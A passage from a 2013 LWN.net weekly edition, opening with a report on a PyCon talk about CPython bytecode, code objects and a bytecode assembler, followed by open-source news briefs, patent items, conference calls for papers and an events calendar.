Bytecode requires a runtime environment, which is provided by the Python VM. The VM has three types of data associated with it, each of which can be manipulated by various opcodes. The first is the instruction pointer, which can be changed with JUMP_* opcodes. The stack is another piece of data the VM keeps track of. Various opcodes like LOAD_* or STORE_* directly add or remove things from the stack, but there are also opcodes to do rotations and other manipulations. The final data storage location for the VM is the "fast locals array", which stores arguments and local variables; the LOAD_FAST and STORE_FAST opcodes are used to access items in that array.

The stack is used to store arbitrary Python objects. The LOAD_* opcodes push something onto the stack, while the STORE_* opcodes remove things from the top. The BINARY_ADD opcode takes the top two objects off the stack, "adds" them (which might not mean addition depending on the types) and loads the result back onto the stack.

There are six different variable types that are used in the VM and which can be moved to or from the stack with the load and store opcodes. Globals and builtins are loaded with LOAD_GLOBAL, while the fast locals array is accessed with with LOAD_FAST. There is a "slow locals" array, which was the original mechanism used for arguments and local variables, but is now used for class and module variables with the LOAD_NAME opcode. Constants use LOAD_CONST, while object attributes use LOAD_ATTR. For all except CONST, there is a corresponding STORE_* opcode.

The last variable type is "cell variables" that use the LOAD_DEREF opcode. Cell variables are local variables that are referenced by a nested function, so that function must look for them in an enclosing scope. In the following, a is a cell variable in foo() (and a "free" variable in bar()).

    def foo():
        a = 1
        def bar():
            print(a)
It is not clear to Hastings why cell variables are handled that way, but they are.

Rooting around in code objects

Looking deeper inside the gunk() object shows that its type is types.FunctionType, but that it contains a code object (gunk.__code__, which is types.CodeType). One thing to note: when talking about various double-underscore names (like __code__), it is evidently traditional in the Python community to use "dunder" to describe them. So while viewing the video of Hastings's talk, or others from PyCon, you will hear things like "dunder code" for __code__.

But if every function object contains a code object, "why have both?", Hastings asked. Code objects must be able to be handled by the marshal binary serialization format, which is conceptually similar to pickle. Marshal is used to create .pyc files. In fact, a .pyc is just three four-byte integers (magic number, datestamp and size of the .py file) followed by a marshaled code object. But function objects contain lots of "extras" that cannot be marshaled (and may not even be pickle-able).

While all of that is true, Hastings asked Python creator Guido van Rossum about the reason for having both kinds of objects a few days before the talk. Van Rossum said that the decision predates marshal and .pyc files, and was originally done to support nested functions so that the code object could be shared by multiple instantiations of the enclosing function. That saves time and memory.

To get to the actual bytecode of gunk(), you need to look at the co_code attribute:

    >>> gunk.__code__.co_code
    b't\x00\x00|\x02\x00\x83\x01\x00\x01d\x00\x00}\x03\x00|\x00\x00|\
    \x01\x00\x17|\x03\x00f\x02\x00S' 
or, slightly more readably:
    >>> [x for x in gunk.__code__.co_code]
    [116, 0, 0, 124, 2, 0, 131, 1, 0, 1, 100, 0, 0, 125, 3, 0, 124, 0, 0, 124,
    1, 0, 23, 124, 3, 0, 102, 2, 0, 83]
He showed the "simplest useful disassembler", which fit on a single slide. It would simply turn the opcode byte into a name and print its argument (if any) as an integer. Running it on itself gives "almost readable" output, he said, which is 80% of what dis.dis() does but in only 15 lines of code.

Digging around in the code object further, Hastings showed other co_* attributes on gunk.__code__. There are counts of various kinds of arguments (positional, keyword) to the function and a count of the fast locals along with an array of their names ('a', 'b', 'args', and 'c', for gunk()). It also contains the arrays referred to in the parameters to opcodes. For example gunk.__code__.co_names contains the global names used in the function ('print' and 'None'), while co_consts has a tuple with the constants (None). Beyond that, there is information on line numbers, filename, module name, maximum stack depth, and on and on.

Modules and classes

A function is just a def statement followed by some code (which gets turned into a code object). A module in Python is just a bunch of code without the def; it also gets turned into a code object. There are no arguments to the module and it effectively ends with a "return None" since all code objects must return.

Classes are a bit more interesting, Hastings said. The "slow" locals dictionary is passed as the argument to the classname callable object. That is something that is new with Python 3 and it allows the __prepare__() method to substitute its own dictionary-like object in place of the __locals__ dictionary. That is all done in support of metaclass handling for Python.

Creating a function by hand is easy to do, with only four lines of code, Hastings said, "but they're four lines that you're not going to like". There is a lot of magic in that slide that creates an add() function, but the three slides following show how to do so in a more readable form. But, even that is not "terribly readable", which is why he wrote his own assembler.

The holy hand grenade

His assembler project, named "Maynard" after the keeper of the "holy hand grenade" ("the most effective disassembler known to man or beast"), includes both an assembler and disassembler. The Maynard repository also contains the sample code from his talk. Its output is "far more readable" when applied to gunk() for example. His eventual goal with Maynard is to make it "round-trippable", so that you could disassemble a function, then assemble the result, and get the function back again. It's close, but not there yet.

Hastings then presented "another terrible idea of mine", which is Perth—a Forth interpreter on top of the CPython VM. It is "really a toy" that does not (yet) implement recursion. That will change as he will not be done until it can implement the Fibonacci number algorithm. "You don't have a real language until you can run Fibonacci", he said. The biggest hurdle he has faced is that the Python stack operations do not allow deep stack manipulations, which leads to some terribly inefficient workarounds for a stack-based language like Forth.

Finally, for his last trick, Hastings presented a five-slide "simplest possible VM" that could nevertheless run fib(). It is a Python VM written completely in Python, which is not "very robust"; it works for that particular function "and nothing else".

If you play with bytecode, Hastings said, there is "something you should expect to see a lot":

    segmentation fault (core dumped)
The Python VM makes no guarantees that it will be robust in the face of badly formed bytecode—it is "very easy to crash". For those wanting more information, the ceval.c file in the Python source tree is the canonical location for the bytecodes, but requires knowledge of C. Hastings also pointed to Ned Batchelder's byterun, which is a pure Python implementation of a bytecode-executing VM.

Interpreted languages provide introspection opportunities that go well beyond just the data structures and objects in the program. There is something rather interesting in being able to root around inside the execution environment of a language like Python. One practical benefit of learning about Python's bytecodes that Hastings didn't mention is that it provides a view into the implementation of an interpreted language. That's certainly of more than simply academic interest.

Comments (9 posted)

Brief items

Quotes of the week

Now open-source is about seeing the sausage making process, you get to see all the bits of stuff you don't want to think go into the sausages, you have to face a lot more truth, and you have to be willing to stand up against things without mummy manager to back you up. You can't have all the nice benefits of open-source development without having the bad side, the public blowups and discussion, it just can't work like that. If we take all those discussions to private lists or emails, where do you draw the line, are the people on that private list some sort of shadowy cabal overlords? Do you want an open-source development model that isn't public?
David Airlie

You're never alone on a project. There's you and the future-you trying to figure out what you did just now.
Christophe Michel (via retweet by Joe Brockmeier)

But, the work never slows and the list of things to do only gets longer, and it can be hard to find the time to go back to everything that isn’t currently on fire or in dire need of upgrading and make sure all of the boxes are properly ticked.

So think carefully about the things that are most important to your project. Double check what you think you’ve done, and ensure that it matches what you have actually done. If your list of things to do only gets longer, you might as well let it grow – it will anyways – and turn a critical eye backwards.

Jeff Mitchell

Comments (none posted)

Yorba crowdfunding Geary development

Back in August 2012, Yorba Foundation founder Adam Dingle spoke at GUADEC about the complexities of crowdfunding development for open source applications. This week, the group officially launched a campaign at IndieGoGo to underwrite development of its open source email client Geary. The target is US $100,000, which, as executive director Jim Nelson explains, is a number chosen to support three full-time developers for the next release cycle. "I doubt there’s a widely-used desktop application out there developed for less than US$100,000 — it’s just that the price tag might be hidden from its users." The campaign runs for one month; among the many factors Dingle spoke of that differentiate between funding sites, IndieGoGo only distributes funds if the target is met.

Comments (29 posted)

MATE 1.6 released

Version 1.6 of the MATE desktop environment is available. "This release is a giant step forward from the 1.4 release. In this release, we have replaced many deprecated packages and libraries with new technologies available in GLib. We have also added a lot of new features to MATE." See the announcement for a list of those new features.

Comments (2 posted)

Twisted 13.0.0 is available

Version 13.0.0 of the Twisted development framework has been released. Highlighted changes include documentation improvements, support for Unicode domain names (after a regression in 12.3) and security fixes.

Full Story (comments: none)

Mozilla and Samsung building a new browser engine

The Mozilla project has announced a collaboration with Samsung to build "Servo", a next-generation browser rendering engine. "Servo is an attempt to rebuild the Web browser from the ground up on modern hardware, rethinking old assumptions along the way. This means addressing the causes of security vulnerabilities while designing a platform that can fully utilize the performance of tomorrow’s massively parallel hardware to enable new and richer experiences on the Web. To those ends, Servo is written in Rust, a new, safe systems language developed by Mozilla along with a growing community of enthusiasts."

Comments (65 posted)

Google's "Blink" rendering engine

Google has announced that it is forking the WebKit rendering engine to make a new project called Blink. "Chromium uses a different multi-process architecture than other WebKit-based browsers, and supporting multiple architectures over the years has led to increasing complexity for both the WebKit and Chromium projects. This has slowed down the collective pace of innovation - so today, we are introducing Blink, a new open source rendering engine based on WebKit."

Comments (37 posted)

Newsletters and articles

Development newsletters from the past week

Comments (none posted)

A look at C++14, part 1

The "Meeting C++" blog looks at some proposed changes to the C++ language to be considered in April. "It is proposed to add a library for pipelines to the C++ Standard, that such a pipeline could be implemented in C++ as such:
    (pipeline::from(input_queue) |
      bind(grep, "^Error") |
      bind(vgrep, "test@example.com") |
      bind(sed, "'s/^Error:.*Message: //") |
      output_queue).run(&threadpool);

Comments (79 posted)

A look at C++14: Papers Part 2

Here's the second part in the C++14 papers series on the "Meeting C++" site. "A proposal for Executors, objects that can execute units of work packaged as function objects. So this is another possible approach to task based parallelism, where the executor object is used as a reusable thread, that can handled a queue of tasks. One possible implementation of an executor is a thread-pool, but other implementations are possible."

Comments (13 posted)

A look at C++14 and beyond: Papers part 3

Part 3 of the "Meeting C++" papers series on C++14 is available. "The concepts approach for C++11 failed, it was dropped, as it was to complex to be adopted fully to the standard for C++11. Since then a lot of people have had their thoughts on how to integrate concepts into the language, as its a feature that would enhance C++ for sure. This proposal now concentraits on template constraints, which shall be applied to force the correctness of template use, not definition."

Comments (8 posted)

What is Open Source Cloud? (Linux.com)

Over at Linux.com, Joe "Zonker" Brockmeier, community evangelist for CloudStack at Citrix, tries to disambiguate the term "cloud". He describes the attributes of clouds, using the US National Institute of Standards and Technology (NIST) definition of cloud computing, looks at the various "X as a service" offerings, how it all works, and why it's important to have open clouds. "Having an open cloud matters because we need to be able to continue the work that GNU and Linux folks have been doing for more than twenty years, at scale. It matters because we need the cloud to be bigger than Amazon or proprietary companies – and because users and organizations should have as much control over their computing destiny at scale as they have had on individual servers."

Comments (3 posted)

McIntyre: Scanning for assembly code in Free Software packages

On his blog, Steve McIntyre writes about work he has been doing to identify assembly code in Linux packages:

In the Linaro Enterprise Group, my task for the last several weeks was to work through a huge number of packages looking for assembly code. Why? So that we could identify code that would need porting to work well on AArch64, the new 64-bit execution state coming to the ARM world Real Soon Now.

Working with some Ubuntu and Fedora developers, we generated a list of packages included in each distribution that seemed to contain assembly code of some sort. Then I worked through that list, checking to see:

  1. if there was actually any assembly there;
  2. if so, what it was for, and
  3. whether it was actually used

That work resulted in a report with his findings.

Comments (30 posted)

Page editor: Nathan Willis

Announcements

Brief items

Google: Taking a stand on open source and patents

Google has announced an initiative to help protect open source software from patent claims. "Today, we’re taking another step towards that goal by announcing the Open Patent Non-Assertion (OPN) Pledge: we pledge not to sue any user, distributor or developer of open-source software on specified patents, unless first attacked. We’ve begun by identifying 10 patents relating to MapReduce, a computing model for processing large data sets first developed at Google—open-source versions of which are now widely used. Over time, we intend to expand the set of Google’s patents covered by the pledge to other technologies."

Comments (12 posted)

Red Hat and Rackspace face down a patent troll

Red Hat and Rackspace Hosting have announced that they have won the dismissal of a patent suit by Uniloc USA. Uniloc was asserting patent #5,892,697, which relates to the handling of floating-point numbers. "In dismissing the case, Chief Judge Leonard Davis found that Uniloc's claim was unpatentable under Supreme Court case law that prohibits the patenting of mathematical algorithms. This is the first reported instance in which the Eastern District of Texas has granted an early motion to dismiss finding a patent invalid because it claimed unpatentable subject matter."

Update: see Groklaw for analysis and the text of the decision.

Comments (6 posted)

Subsurface mourns Jan Schubert

The Subsurface project mourns the loss of Jan Schubert. "It is with great sadness that we say a final 'Tschüss' to one of our most active and engaging developers. Without Jan, Subsurface would not support the needs of technical divers the way it does today."

Comments (none posted)

Articles of interest

Baker: Celebrating 15 Years of a Better Web

Mitchell Baker looks back at Mozilla's first 15 years and ponders the years to come as well. "In the coming era both the opportunities and threats to the Web are just as big as they were 15 years ago. As the role of data grows and device capabilities expand, the Internet will become an even more central part of our lives. The need for individuals to have some control over how this works and what we experience is fundamental. Mozilla can — and must — play a key role again. We have the vision, the products and the technology to do this. We know how to enable people to participate, both by contributing to our specific activities and coming up with their own ideas that advance the bigger cause of enriching the Web."

Comments (none posted)

Free Software Supporter -- Issue 60

The March edition of the Free Software Foundation's newsletter is out. Topics include Hollyweb, LibrePlanet, Google and instant messaging, unlocking cell phones, an interview with Adam Hyde, Free Software Award winners, the DRM-free label, Document Freedom Day, Trisquel, and more.

Full Story (comments: none)

FSFE: How to break free from Skype

The Free Software Foundation Europe notes that Microsoft will discontinue its Windows Messenger service and switch current users to Skype. "The Free Software Foundation Europe advises former users of Windows Messenger to take this as an opportunity to embrace Open Standards such as Jabber (XMPP) instead of switching to Skype."

Full Story (comments: 2)

How crowdfunding and the JOBS Act will shape open source companies (O'Reilly)

This O'Reilly Radar post makes the case that upcoming changes in how shares of companies can be sold in the US will facilitate the creation of a new flood of open-source companies. "Now, open source projects will be able to seek and find crowds of investors from within their own communities. These companies will have both the traditional advantages of proprietary companies (well-capitalized companies recruit armies of competent programmers and sales forces that can survive long sales cycles) and the advantages of the open source development model (open code review and the ability to integrate the insights of outsiders)."

Comments (1 posted)

Calls for Presentations

Call for papers for Dyla'13

Dyla'13, the 7th Workshop on Dynamic Languages and Applications, will take place July 1-5 in Montpellier, France. The submission deadline is April 19.

Full Story (comments: none)

GUADEC 2013 Call for Presentations

The GNOME Users and Developers Conference GUADEC will take place August 1-8, in Brno, Czech Republic. The call for presentations is open until April 27.

Full Story (comments: none)

Extended CfP at PyCon SG 2013

PyCon SG will take place June 13-15 in Singapore. The call for proposals, presentations and tutorials has been extended until April 30.

Full Story (comments: none)

openSUSE Conference 2013 Call for Papers

The openSUSE Conference takes place July 18-22 in Thessaloniki, Greece. The CfP deadline has been extended to June 17 or until all slots are filled.

Comments (none posted)

Upcoming Events

PyCon Australia 2013 Early Bird registration

Early bird registration for PyCon Australia is open. PyCon AU takes place July 5-7 in Hobart, Tasmania. Early bird registration will be extended to the first 80 confirmed conference registrations, or until May 3, whichever comes first.

Full Story (comments: none)

PostgreSQL Conference Europe 2013

PGConf.EU 2013 will be held October 29-November 1 in Dublin, Ireland. "The format will be the same as previous years - one day of training before the main event consisting of three days fully packed with sessions about PostgreSQL."

Full Story (comments: none)

Events: April 4, 2013 to June 3, 2013

The following event listing is taken from the LWN.net Calendar.

Date(s)EventLocation
April 1
April 5
Scientific Software Engineering Conference Boulder, CO, USA
April 4
April 7
OsmoDevCon 2013 Berlin, Germany
April 4
April 5
Distro Recipes Paris, France
April 6
April 7
international Openmobility conference 2013 Bratislava, Slovakia
April 8 The CentOS Dojo 2013 Antwerp, Belgium
April 8
April 9
Write The Docs Portland, OR, USA
April 10
April 13
Libre Graphics Meeting Madrid, Spain
April 10
April 13
Evergreen ILS 2013 Vancouver, Canada
April 14 OpenShift Origin Community Day Portland, OR, USA
April 15
April 18
OpenStack Summit Portland, OR, USA
April 15
April 17
LF Collaboration Summit San Francisco, CA, USA
April 15
April 17
Open Networking Summit Santa Clara, CA, USA
April 16
April 18
Lustre User Group 13 San Diego, CA, USA
April 17
April 18
Open Source Data Center Conference Nuremberg, Germany
April 17
April 19
IPv6 Summit Denver, CO, USA
April 18
April 19
Linux Storage, Filesystem and MM Summit San Francisco, CA, USA
April 19 Puppet Camp Nürnberg, Germany
April 20 Grazer Linuxtage Graz, Austria
April 21
April 22
Free and Open Source Software COMmunities Meeting 2013 Athens, Greece
April 22
April 25
Percona Live MySQL Conference and Expo Santa Clara, CA, USA
April 26 MySQL® & Cloud Database Solutions Day Santa Clara, CA, USA
April 26
April 27
Linuxwochen Eisenstadt Eisenstadt, Austria
April 27
April 28
LinuxFest Northwest Bellingham, WA, USA
April 27
April 28
WordCamp Melbourne 2013 Melbourne, Australia
April 29
April 30
2013 European LLVM Conference Paris, France
April 29
April 30
Open Source Business Conference San Francisco, CA, USA
May 1
May 3
DConf 2013 Menlo Park, CA, USA
May 2
May 4
Linuxwochen Wien 2013 Wien, Austria
May 9
May 12
Linux Audio Conference 2013 Graz, Austria
May 10 Open Source Community Summit Washington, DC, USA
May 10 CentOS Dojo, Phoenix Phoenix, AZ, USA
May 14
May 15
LF Enterprise End User Summit New York, NY, USA
May 14
May 17
SambaXP 2013 Göttingen, Germany
May 15
May 19
DjangoCon Europe Warsaw, Poland
May 16 NLUUG Spring Conference 2013 Maarssen, Netherlands
May 22
May 23
Open IT Summit Berlin, Germany
May 22
May 24
Tizen Developer Conference San Francisco, CA, USA
May 22
May 25
LinuxTag 2013 Berlin, Germany
May 23
May 24
PGCon 2013 Ottawa, Canada
May 24
May 25
GNOME.Asia Summit 2013 Seoul, Korea
May 27
May 28
Automotive Linux Summit Tokyo, Japan
May 28
May 29
Solutions Linux, Libres et Open Source Paris, France
May 29
May 31
Linuxcon Japan 2013 Tokyo, Japan
May 30 Prague PostgreSQL Developers Day Prague, Czech Republic
May 31
June 1
Texas Linux Festival 2013 Austin, TX, USA
June 1
June 2
Debian/Ubuntu Community Conference Italia 2013 Fermo, Italy
June 1
June 4
European Lisp Symposium Madrid, Spain

If your event does not appear here, please tell us about it.

Page editor: Rebecca Sobol


Copyright © 2013, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds